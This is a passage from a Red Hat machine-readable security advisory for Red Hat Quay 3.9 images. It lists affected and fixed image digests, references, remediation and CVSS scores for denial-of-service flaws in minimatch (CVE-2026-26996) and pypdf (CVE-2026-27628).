"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
